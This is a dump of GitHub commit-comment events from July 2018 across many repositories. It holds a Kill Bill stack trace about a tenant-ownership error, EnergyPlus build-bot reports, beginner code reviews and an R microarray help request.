{"id":"8014366326","type":"CommitCommentEvent","actor":{"login":"fieryorc"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":29824339,"position":null,"line":null,"path":null,"commit_id":"42fa6b2c28270333d5e7acc81e4de59e291e13c4","created_at":"2018-07-25T06:08:48Z","updated_at":"2018-07-25T06:08:48Z","author_association":"NONE","body":"I tested with IncludeDeleted=true, but I get another error. \r\n\r\n2018-07-25T05:01:34,830+0000 lvl='INFO', log='LoggingFilter', th='catalina-exec-4', xff='', rId='03053023-1851-4017-bac2-2b40751fa4bd', aRId='', tRId='3', 22 * Server in-bound request\r\n22 > GET http://127.0.0.1:9191/1.0/kb/bundles?externalKey=bundle1&includedDeleted=true\r\n22 > host: 127.0.0.1:9191\r\n22 > user-agent: Go-http-client/1.1\r\n22 > accept: application/json\r\n22 > authorization: **************************\r\n22 > x-killbill-apikey: t1\r\n22 > x-killbill-apisecret: **\r\n22 > accept-encoding: gzip\r\n22 > \r\n\r\n2018-07-25T05:01:34,837+0000 lvl='WARN', log='LoggingResponse', th='catalina-exec-4', xff='', rId='03053023-1851-4017-bac2-2b40751fa4bd', aRId='', tRId='3', Internal error\r\njava.lang.IllegalStateException: Object id=8edf5a83-4634-42d3-afd3-351592b0d919 type=BUNDLE doesn't belong to tenant id=093adcfe-fa34-41a3-99cb-67e6a9bda8fc\r\n\tat org.killbill.billing.util.callcontext.InternalCallContextFactory.getAccountRecordIdSafe(InternalCallContextFactory.java:374)\r\n\tat org.killbill.billing.util.callcontext.InternalCallContextFactory.getAccountId(InternalCallContextFactory.java:345)\r\n\tat org.killbill.billing.entitlement.api.DefaultSubscriptionApi.getSubscriptionBundle(DefaultSubscriptionApi.java:161)\r\n\tat org.killbill.billing.util.glue.KillbillApiAopModule$ProfilingMethodInterceptor$1.execute(KillbillApiAopModule.java:76)\r\n\tat org.killbill.commons.profiling.Profiling.executeWithProfiling(Profiling.java:33)\r\n\tat org.killbill.billing.util.glue.KillbillApiAopModule$ProfilingMethodInterceptor.invoke(KillbillApiAopModule.java:92)\r\n\tat org.killbill.billing.entitlement.api.DefaultSubscriptionApi.getSubscriptionBundlesForExternalKey(DefaultSubscriptionApi.java:212)\r\n\tat org.killbill.billing.util.glue.KillbillApiAopModule$ProfilingMethodInterceptor$1.execute(KillbillApiAopModule.java:76)\r\n\tat org.killbill.commons.profiling.Profiling.executeWithProfiling(Profiling.java:33)\r\n\tat org.killbill.billing.util.glue.KillbillApiAopModule$ProfilingMethodInterceptor.invoke(KillbillApiAopModule.java:92)\r\n\tat org.killbill.billing.jaxrs.resources.BundleResource.getBundleByKey(BundleResource.java:151)\r\n\tat org.killbill.commons.skeleton.metrics.TimedResourceInterceptor.invoke(TimedResourceInterceptor.java:69)\r\n\tat org.killbill.billing.server.modules.JaxRSAopModule$JaxRsMethodInterceptor$1.execute(JaxRSAopModule.java:87)\r\n\tat org.killbill.billing.util.entity.dao.DBRouterUntyped.withRODBIAllowed(DBRouterUntyped.java:57)\r\n\tat org.killbill.billing.server.modules.JaxRSAopModule$JaxRsMethodInterceptor.invoke(JaxRSAopModule.java:82)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:498)\r\n\tat com.sun.jersey.spi.container.JavaMethodInvokerFactory$1.invoke(JavaMethodInvokerFactory.java:60)\r\n\tat com.sun.jersey.server.impl.model.method.dispatch.AbstractResourceMethodDispatchProvider$ResponseOutInvoker._dispatch(AbstractResourceMethodDispatchProvider.java:205)\r\n\tat com.sun.jersey.server.impl.model.method.dispatch.ResourceJavaMethodDispatcher.dispatch(ResourceJavaMethodDispatcher.java:75)\r\n\tat com.sun.jersey.server.impl.uri.rules.HttpMethodRule.accept(HttpMethodRule.java:302)\r\n\tat com.sun.jersey.server.impl.uri.rules.ResourceClassRule.accept(ResourceClassRule.java:108)\r\n\tat com.sun.jersey.server.impl.uri.rules.RightHandPathRule.accept(RightHandPathRule.java:147)\r\n\tat com.sun.jersey.server.impl.uri.rules.RootResourceClassesRule.accept(RootResourceClassesRule.java:84)\r\n\tat com.sun.jersey.server.impl.application.WebApplicationImpl._handleRequest(WebApplicationImpl.java:1542)\r\n\tat com.sun.jersey.server.impl.application.WebApplicationImpl._handleRequest(WebApplicationImpl.java:1473)\r\n\tat com.sun.jersey.server.impl.application.WebApplicationImpl.handleRequest(WebApplicationImpl.java:1419)\r\n\tat com.sun.jersey.server.impl.application.WebApplicationImpl.handleRequest(WebApplicationImpl.java:1409)\r\n\tat com.sun.jersey.spi.container.servlet.WebComponent.service(WebComponent.java:409)\r\n\tat com.sun.jersey.spi.container.servlet.ServletContainer.service(ServletContainer.java:558)\r\n\tat com.sun.jersey.spi.container.servlet.ServletContainer.service(ServletContainer.java:733)\r\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:742)\r\n\tat com.google.inject.servlet.ServletDefinition.doServiceImpl(ServletDefinition.java:286)\r\n\tat com.google.inject.servlet.ServletDefinition.doService(ServletDefinition.java:276)\r\n\tat com.google.inject.servlet.ServletDefinition.service(ServletDefinition.java:181)\r\n\tat com.google.inject.servlet.ManagedServletPipeline.service(ManagedServletPipeline.java:91)\r\n\tat com.google.inject.servlet.FilterChainInvocation.doFilter(FilterChainInvocation.java:85)\r\n\tat org.killbill.billing.server.security.TenantFilter.doFilter(TenantFilter.java:111)\r\n\tat com.google.inject.servlet.FilterChainInvocation.doFilter(FilterChainInvocation.java:82)\r\n\tat org.killbill.billing.server.filters.ResponseCorsFilter.doFilter(ResponseCorsFilter.java:75)\r\n\tat com.google.inject.servlet.FilterChainInvocation.doFilter(FilterChainInvocation.java:82)\r\n\tat ch.qos.logback.classic.helpers.MDCInsertingServletFilter.doFilter(MDCInsertingServletFilter.java:49)\r\n\tat com.google.inject.servlet.FilterChainInvocation.doFilter(FilterChainInvocation.java:82)\r\n\tat com.google.inject.servlet.ManagedFilterPipeline.dispatch(ManagedFilterPipeline.java:120)\r\n\tat com.google.inject.servlet.GuiceFilter.doFilter(GuiceFilter.java:135)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)\r\n\tat org.apache.shiro.guice.web.SimpleFilterChain.doFilter(SimpleFilterChain.java:44)\r\n\tat org.apache.shiro.web.servlet.AdviceFilter.executeChain(AdviceFilter.java:108)\r\n\tat org.apache.shiro.web.servlet.AdviceFilter.doFilterInternal(AdviceFilter.java:137)\r\n\tat org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)\r\n\tat org.apache.shiro.guice.web.SimpleFilterChain.doFilter(SimpleFilterChain.java:41)\r\n\tat org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)\r\n\tat org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)\r\n\tat org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)\r\n\tat org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)\r\n\tat org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:383)\r\n\tat org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)\r\n\tat org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)\r\n\tat com.codahale.metrics.servlet.AbstractInstrumentedFilter.doFilter(AbstractInstrumentedFilter.java:111)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)\r\n\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:198)\r\n\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)\r\n\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:478)\r\n\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:140)\r\n\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:80)\r\n\tat org.apache.catalina.valves.rewrite.RewriteValve.invoke(RewriteValve.java:279)\r\n\tat org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:624)\r\n\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:87)\r\n\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:342)\r\n\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:799)\r\n\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)\r\n\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:868)\r\n\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1455)\r\n\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\r\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)\r\n\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\r\n\tat java.lang.Thread.run(Thread.java:748)\r\n2018-07-25T05:01:34,838+0000 lvl='INFO', log='LoggingFilter', th='catalina-exec-4', xff='', rId='03053023-1851-4017-bac2-2b40751fa4bd', aRId='', tRId='3', 22 * Server out-bound response\r\n22 < 500\r\n22 < Content-Type: application/json\r\n22 < \r\n\r\n\r\n"}},"created_at":"2018-07-25T06:08:48Z"}
{"id":"8014371903","type":"CommitCommentEvent","actor":{"login":"heinrich5991"},"repo":{"name":"ddnet/ddnet"},"payload":{"comment":{"id":29824354,"position":null,"line":null,"path":null,"commit_id":"d08f03fecf16256b7333855edf617f4b9a6d8466","created_at":"2018-07-25T06:10:33Z","updated_at":"2018-07-25T06:10:33Z","author_association":"CONTRIBUTOR","body":"No. Feel free to pull-request that. :)"}},"created_at":"2018-07-25T06:10:33Z"}
{"id":"8014376187","type":"CommitCommentEvent","actor":{"login":"Shadowss"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29824359,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-25T06:11:54Z","updated_at":"2018-07-25T06:11:54Z","author_association":"OWNER","body":"Works on new PHP version."}},"created_at":"2018-07-25T06:11:54Z"}
{"id":"8014380847","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29824367,"position":null,"line":null,"path":null,"commit_id":"eabd4d59642a647988802228e7d48fbbeb5cdb29","created_at":"2018-07-25T06:13:23Z","updated_at":"2018-07-25T06:13:23Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2943 of 2944 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-25T06:13:23Z"}
{"id":"8014382966","type":"CommitCommentEvent","actor":{"login":"Tuanvnsa"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29824372,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T06:14:02Z","updated_at":"2018-07-25T06:14:02Z","author_association":"NONE","body":"Hiii, Project very good!\n\n2018-07-25 12:48 GMT+07:00 Roman Sazonov <notifications@github.com>:\n\n> Great project\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29824207>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnMJ1_taUSHtG_Y6RubFZYPMPb9ICGWIks5uKAaqgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-25T06:14:02Z"}
{"id":"8014385720","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29824377,"position":null,"line":null,"path":null,"commit_id":"5b35cd7251e2238227e1ffdee2dcc14777757d52","created_at":"2018-07-25T06:14:51Z","updated_at":"2018-07-25T06:14:51Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (mjwitte) - i386-Windows-7-VisualStudio-14: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T06:14:51Z"}
{"id":"8014386141","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29824379,"position":null,"line":null,"path":null,"commit_id":"5b35cd7251e2238227e1ffdee2dcc14777757d52","created_at":"2018-07-25T06:15:00Z","updated_at":"2018-07-25T06:15:00Z","author_association":"NONE","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-Win64-Windows-7-VisualStudio-14.html'>Unhandled Failure</a>\n"}},"created_at":"2018-07-25T06:15:00Z"}
{"id":"8014387607","type":"CommitCommentEvent","actor":{"login":"andypalmer"},"repo":{"name":"Becca9941/portfolio-webdevbecca"},"payload":{"comment":{"id":29824385,"position":16,"line":16,"path":"articles-landing.php","commit_id":"c1790c1126b879f060b4a6f612c21c2cdecd2790","created_at":"2018-07-25T06:15:17Z","updated_at":"2018-07-25T06:15:17Z","author_association":"NONE","body":"These comments tell you what you're doing... ideally comments should explain _why_ you're doing something.\r\nWhile these comments are useful for you as a beginner, as you get better at doing this, you'll essentially see ```<link rel=\"icon\" ... >``` as semantically the same as the comment, and the comment will be unnecessary."}},"created_at":"2018-07-25T06:15:17Z"}
{"id":"8014392676","type":"CommitCommentEvent","actor":{"login":"lordvlad"},"repo":{"name":"sameersbn/docker-gitlab"},"payload":{"comment":{"id":29824390,"position":null,"line":null,"path":null,"commit_id":"a28268c1194147ea3b7e232c644937d2a0eef9a0","created_at":"2018-07-25T06:16:44Z","updated_at":"2018-07-25T06:16:44Z","author_association":"CONTRIBUTOR","body":"does this require any migration step or can I simply upgrade the stack to new versions?"}},"created_at":"2018-07-25T06:16:44Z"}
{"id":"8014394979","type":"CommitCommentEvent","actor":{"login":"kartheekmuppidi"},"repo":{"name":"techstargroupinc/Testing"},"payload":{"comment":{"id":29824394,"position":1,"line":1,"path":"hi","commit_id":"500c9bcb0808bcc896555b3a380f546c2a16c240","created_at":"2018-07-25T06:17:24Z","updated_at":"2018-07-25T06:17:24Z","author_association":"COLLABORATOR","body":"heyyyyy"}},"created_at":"2018-07-25T06:17:24Z"}
{"id":"8014396228","type":"CommitCommentEvent","actor":{"login":"kartheekmuppidi"},"repo":{"name":"techstargroupinc/Testing"},"payload":{"comment":{"id":29824398,"position":null,"line":null,"path":null,"commit_id":"500c9bcb0808bcc896555b3a380f546c2a16c240","created_at":"2018-07-25T06:17:46Z","updated_at":"2018-07-25T06:17:46Z","author_association":"COLLABORATOR","body":"hdhdhdhdh"}},"created_at":"2018-07-25T06:17:46Z"}
{"id":"8014397466","type":"CommitCommentEvent","actor":{"login":"RajeshProJadon"},"repo":{"name":"RajeshProJadon/CS50W"},"payload":{"comment":{"id":29824407,"position":null,"line":null,"path":null,"commit_id":"64800153a436acea5c51d8294e382bf199ed1be7","created_at":"2018-07-25T06:18:10Z","updated_at":"2018-07-25T06:18:10Z","author_association":"OWNER","body":"commit my file"}},"created_at":"2018-07-25T06:18:10Z"}
{"id":"8014407128","type":"CommitCommentEvent","actor":{"login":"velhbxtyrj"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29824432,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-25T06:21:01Z","updated_at":"2018-07-25T06:21:01Z","author_association":"COLLABORATOR","body":"@Shadowss I checked this on the hosting where the PHP 7.0 is installed"}},"created_at":"2018-07-25T06:21:01Z"}
{"id":"8014407211","type":"CommitCommentEvent","actor":{"login":"andypalmer"},"repo":{"name":"Becca9941/portfolio-webdevbecca"},"payload":{"comment":{"id":29824433,"position":13,"line":20,"path":"individual-article.php","commit_id":"d40772f4ce24397ee547416865efb04aa3a22016","created_at":"2018-07-25T06:21:03Z","updated_at":"2018-07-25T06:21:03Z","author_association":"NONE","body":"This comment is a lie... you don't actually output any of the variables inside the loop. What actually happens is that you store the details of the last row (after iterating through all of them) and these get output later in the document."}},"created_at":"2018-07-25T06:21:03Z"}
{"id":"8014409240","type":"CommitCommentEvent","actor":{"login":"Aviseka"},"repo":{"name":"komalsrathi/Microarray_Analysis"},"payload":{"comment":{"id":29824439,"position":null,"line":null,"path":null,"commit_id":"4ecef78e9425dea78c2ee610a18a1e0c3a0687f9","created_at":"2018-07-25T06:21:39Z","updated_at":"2018-07-25T06:21:39Z","author_association":"NONE","body":"Dear Komal,\n\n \n\nHere I have mentioned  the code from your repository  which I have tried to use to read and analyze the MoGene-2_0-st.CEL files  . The oligo version I am using is 1.44.0. I have attached the screenshot of the R . \n\n \n\nI am really sorry that  I didn’t understand properly  from your first mail cause I am a cell biologist and I am currently  learning R to handle such .CEL files. \n\n If these information are  not enough to guide me then I will provide more information \n\n \n\nThanks for your help  J\n\n \n\nRegards\n\nAviseka \n\n \n\n \n\n# basic libraries to load\n\nlibrary(oligo)\n\nlibrary(reshape)\n\nlibrary(ggplot2)\n\nlibrary(gridExtra)\n\nlibrary(limma)\n\n \n\n  # libraries based on the genechip\n\n  library(mogene20sttranscriptcluster.db)\n\n \n\n  # set working directory\n\n  \n\n  ########### load sample/phenotype data ################\n\ns <- read.csv(\"/data/samples.csv\") #usually contains the id, type/treat of sample\n\ngrps <- s$type  # type of samples\n\nnames <- s$id   # id of samples\n\n########### load sample/phenotype data ################\n\n \n\n  \n\n  ################## get normalized counts #########################\n\nsetwd(\"C:/Users/akp0396/Desktop/R/Rui file/Test cell file/Helene CEL file\")\n\n(celFiles <- list.celfiles(getwd())) # get list of cel files\n\naffyGeneFS <- read.celfiles(celFiles,verbose=TRUE) # read celFiles\n\ncon2 <- db(pd.mogene.2.0.st) # db connection\n\neset <- rma(affyGeneFS, target='core') # # rma normalization GeneFeatureSet\n\neset <- rma(affyGeneFS) # # rma normalization ExpressionFeatureSet\n\n \n\nexpr.unnorm <- exprs(affyGeneFS) # contains unnormalized counts of all genes\n\nexpr <- exprs(eset) #contains normalized counts of all genes\n\n \n\nERROR\n\n\n> library(\"oligo\", lib.loc=\"~/R/win-library/3.5\")\n\nLoading required package: oligoClasses\n\nError: package or namespace load failed for ‘oligoClasses’ in loadNamespace(j <- i[[1L]], c(lib.loc, .libPaths()), versionCheck = vI[[j]]):\n\nnamespace ‘BiocGenerics’ 0.26.0 is already loaded, but >= 0.27.1 is required\n\nError: package ‘oligoClasses’ could not be loaded\n\n> (celFiles <- list.celfiles(getwd())) # get list of cel files\n\n[1] \"1_Beuf_(MoGene-2_0-st).CEL\"    \"10_Beuf_(MoGene-2_0-st).CEL\"   \"11_Beuf_(MoGene-2_0-st).CEL\"   \"12_Beuf_(MoGene-2_0-st)_2.CEL\" \"2_Beuf_(MoGene-2_0-st).CEL\"   \n\n [6] \"3_Beuf_(MoGene-2_0-st).CEL\"    \"4_Beuf_(MoGene-2_0-st).CEL\"    \"5_Beuf_(MoGene-2_0-st).CEL\"    \"6_Beuf_(MoGene-2_0-st).CEL\"    \"7_Beuf_(MoGene-2_0-st).CEL\"   \n\n[11] \"8_Beuf_(MoGene-2_0-st).CEL\"    \"9_Beuf_(MoGene-2_0-st).CEL\"   \n\n> affyGeneFS <- read.celfiles(celFiles,verbose=TRUE) # read celFiles\n\nError in read.celfiles(celFiles, verbose = TRUE) : \n\n  could not find function \"read.celfiles\"\n\n\t\n\n\t\n\n \n\n \n\n\n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\nBest Regards\n\nAviseka Acharya\n\nInstitut für Neurophysiologie\n\nder Universität zu Köln\n\nRobert-Koch-Strasse 39\n\nD-50931 Köln\n\nTel.: +49 (0)221 478-97883\n\n <https://twitter.com/aviseka> twitter-icon  <https://www.facebook.com/aviseka.acharya> facebook-logo-png-9  <https://calendar.google.com/calendar?cid=MnQ3aTFqMGY3cjdvcXQ3bTdyNHIxcHZvNGdAZ3JvdXAuY2FsZW5kYXIuZ29vZ2xlLmNvbQ> \n\n\n\n \n\n\n\n \n\nFrom: Komal Rathi [mailto:notifications@github.com] \nSent: 07-25-2018 02 49\nTo: komalsrathi/Microarray_Analysis\nCc: Aviseka; Mention\nSubject: Re: [komalsrathi/Microarray_Analysis] get expressed probes (4ecef78)\n\n \n\nI am not sure what issue you are facing exactly - you just posted the R version you are using. Unless you post the full code what you are trying to do, I can't help you. Best would be if you'd look at the documentation of oligo package.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/komalsrathi/Microarray_Analysis/commit/4ecef78e9425dea78c2ee610a18a1e0c3a0687f9#commitcomment-29822264> , or mute the thread <https://github.com/notifications/unsubscribe-auth/AnYzos8nqeOwUsleQs1RAMDjFPxWt39nks5uJ8CTgaJpZM4VcvOC> .  <https://github.com/notifications/beacon/AnYzopCg_w4TpRxb9VlREjUpMp4I5cCTks5uJ8CTgaJpZM4VcvOC.gif> \n\n"}},"created_at":"2018-07-25T06:21:39Z"}
{"id":"8014434796","type":"CommitCommentEvent","actor":{"login":"sinedsem"},"repo":{"name":"enten/angular-universal"},"payload":{"comment":{"id":29824475,"position":15,"line":47,"path":"src/main.ts","commit_id":"48385fd718c33700f09af4477a4823df36413a90","created_at":"2018-07-25T06:29:20Z","updated_at":"2018-07-25T06:29:20Z","author_association":"NONE","body":"What about log?"}},"created_at":"2018-07-25T06:29:20Z"}
{"id":"8014438489","type":"CommitCommentEvent","actor":{"login":"4O4"},"repo":{"name":"mhogomchungu/sirikali"},"payload":{"comment":{"id":29824487,"position":null,"line":null,"path":null,"commit_id":"05892e8c3bd778aaae6c004d7089fbf9b41bd291","created_at":"2018-07-25T06:30:21Z","updated_at":"2018-07-25T06:30:21Z","author_association":"NONE","body":"Wonderful! 👍 "}},"created_at":"2018-07-25T06:30:21Z"}
{"id":"8014442462","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29824494,"position":null,"line":null,"path":null,"commit_id":"cb1331ef9bfe716771e976e729de4a958856ed9d","created_at":"2018-07-25T06:31:30Z","updated_at":"2018-07-25T06:31:30Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-926](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-926).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-926-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T06:31:30Z"}
{"id":"8014443636","type":"CommitCommentEvent","actor":{"login":"JVMerkle"},"repo":{"name":"Moberstein/LaTeX-Workshop"},"payload":{"comment":{"id":29824497,"position":null,"line":null,"path":null,"commit_id":"d5dfe531d849877d83be7258ece96f99dffd196a","created_at":"2018-07-25T06:31:50Z","updated_at":"2018-07-25T06:31:50Z","author_association":"NONE","body":"Please submit your work on [James-Yu/LaTeX-Workshop](https://github.com/James-Yu/LaTeX-Workshop). Thank you for your valuable contribution to us _subimport_ users."}},"created_at":"2018-07-25T06:31:50Z"}
{"id":"8014445805","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29824498,"position":11,"line":8,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"23b72843845deb9903f472bc5d2ec5122c1dfc82","created_at":"2018-07-25T06:32:27Z","updated_at":"2018-07-25T06:32:27Z","author_association":"NONE","body":"Нет, так даже не скомпилируется: ```void``` может быть использован только в определении метода, указывая, что метод не возвращает значения. А присваивание может быть использовано только с переменными и полями. Нельзя указывать ```void``` в объявлении переменной/поля, т.к. это не тип данных.\r\n\r\nТы правильно думаешь, что тут должно быть что-то связанное с полем и методом. но опять не хватает уточняющих вопросов от тебя. Здесь не получится решить задачу используя только статические члены классов, вот и у тебя и не получается, но ты при этом не задаёшь вопросов, не выражаешь, что вызывает у тебя затруднение, просто пишешь неработающих код. Давай не будем так. "}},"created_at":"2018-07-25T06:32:27Z"}
{"id":"8014445855","type":"CommitCommentEvent","actor":{"login":"elektroschmock"},"repo":{"name":"CypherOS/device_motorola_shamu"},"payload":{"comment":{"id":29824499,"position":null,"line":null,"path":null,"commit_id":"cdcc2b30602d17f71bd6d43b357e311f8eacd67b","created_at":"2018-07-25T06:32:28Z","updated_at":"2018-07-25T06:32:28Z","author_association":"CONTRIBUTOR","body":"The vendor subdir isn't picked up by the build system.\r\nYou need to add it or move it to sepolicy dir."}},"created_at":"2018-07-25T06:32:28Z"}
{"id":"8014447009","type":"CommitCommentEvent","actor":{"login":"tyrann0us"},"repo":{"name":"inpsyde/inpsyde-google-tag-manager"},"payload":{"comment":{"id":29824503,"position":10,"line":7,"path":"inpsyde-google-tag-manager.php","commit_id":"344e6d5da3a6a59acd02b875fa2ccc6654211070","created_at":"2018-07-25T06:32:47Z","updated_at":"2018-07-25T06:32:47Z","author_association":"MEMBER","body":"Missing linebreak?"}},"created_at":"2018-07-25T06:32:47Z"}
{"id":"8014448201","type":"CommitCommentEvent","actor":{"login":"elektroschmock"},"repo":{"name":"CypherOS/device_motorola_shamu"},"payload":{"comment":{"id":29824504,"position":null,"line":null,"path":null,"commit_id":"77c37ce6e9b2c8373853f2a4ee6686da18b98719","created_at":"2018-07-25T06:33:06Z","updated_at":"2018-07-25T06:33:06Z","author_association":"CONTRIBUTOR","body":"The HWUI values aren't used anymore since 8.1"}},"created_at":"2018-07-25T06:33:06Z"}
{"id":"8014448477","type":"CommitCommentEvent","actor":{"login":"danwood76"},"repo":{"name":"danwood76/android_kernel_samsung_exynos7580-common"},"payload":{"comment":{"id":29824505,"position":null,"line":null,"path":null,"commit_id":"83e2e8199f08bc4fb0cd9cb7d000680524a4bbde","created_at":"2018-07-25T06:33:10Z","updated_at":"2018-07-25T06:33:10Z","author_association":"OWNER","body":"Very interesting, my patch didn't seem to do a lot to the governor but I wasn't sure why.\r\n\r\nI will have a go at porting that HAL over to our device this morning and see if I can get it to work."}},"created_at":"2018-07-25T06:33:10Z"}
{"id":"8014448829","type":"CommitCommentEvent","actor":{"login":"tyrann0us"},"repo":{"name":"inpsyde/inpsyde-google-tag-manager"},"payload":{"comment":{"id":29824506,"position":11,"line":8,"path":"inpsyde-google-tag-manager.php","commit_id":"344e6d5da3a6a59acd02b875fa2ccc6654211070","created_at":"2018-07-25T06:33:16Z","updated_at":"2018-07-25T06:33:16Z","author_association":"MEMBER","body":"Missing line break on line 7 before \"Author\"?"}},"created_at":"2018-07-25T06:33:16Z"}
